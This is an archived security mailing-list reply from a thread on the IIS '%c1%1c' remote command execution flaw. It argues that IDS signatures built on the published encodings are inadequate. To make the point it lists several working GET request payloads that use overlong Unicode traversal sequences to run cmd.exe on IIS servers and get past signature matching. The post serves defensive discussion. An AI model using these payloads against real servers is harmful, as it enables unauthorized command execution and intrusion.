etCYBERSPACE.ORG

• Next message: van der Kooij, Hugo: "Re: [RHSA-2000:087-02] Potential security problems in ping fixed."
• Previous message: Atro Tossavainen: "Re: Solaris libc locale format string exploit"
• In reply to: rain forest puppy: "Re: IIS %c1%1c remote command execution"
• Next in thread: Cris Bailiff: "Re: IIS %c1%1c remote command execution"
• Reply: ET LoWNOISE: "[LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hola,

Just a quick note to add.
Too many people are now just creating new signatures on their IDS to
"protect" their servers based on the recents advisories where appears only
exploit information with:

%c1%1c
%c0%af
%c1%9c

Is just a misunderstanding there are too many ways to exploit this
bug..doing a quick search :

 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
 GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir (C-1-PC)

this is just in the range c0 00 to c2 00...!

Efrain 'ET' Torres
[LoWNOISE] Colombia
etcyberspace.org

• Next message: van der Kooij, Hugo: "Re: [RHSA-2000:087-02] Potential security problems in ping fixed."
• Previous message: Atro Tossavainen: "Re: Solaris libc locale format string exploit"
• In reply to: rain forest puppy: "Re: IIS %c1%1c remote command execution"
• Next in thread: Cris Bailiff: "Re: IIS %c1%1c remote command execution"
• Reply: ET LoWNOISE: "[LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]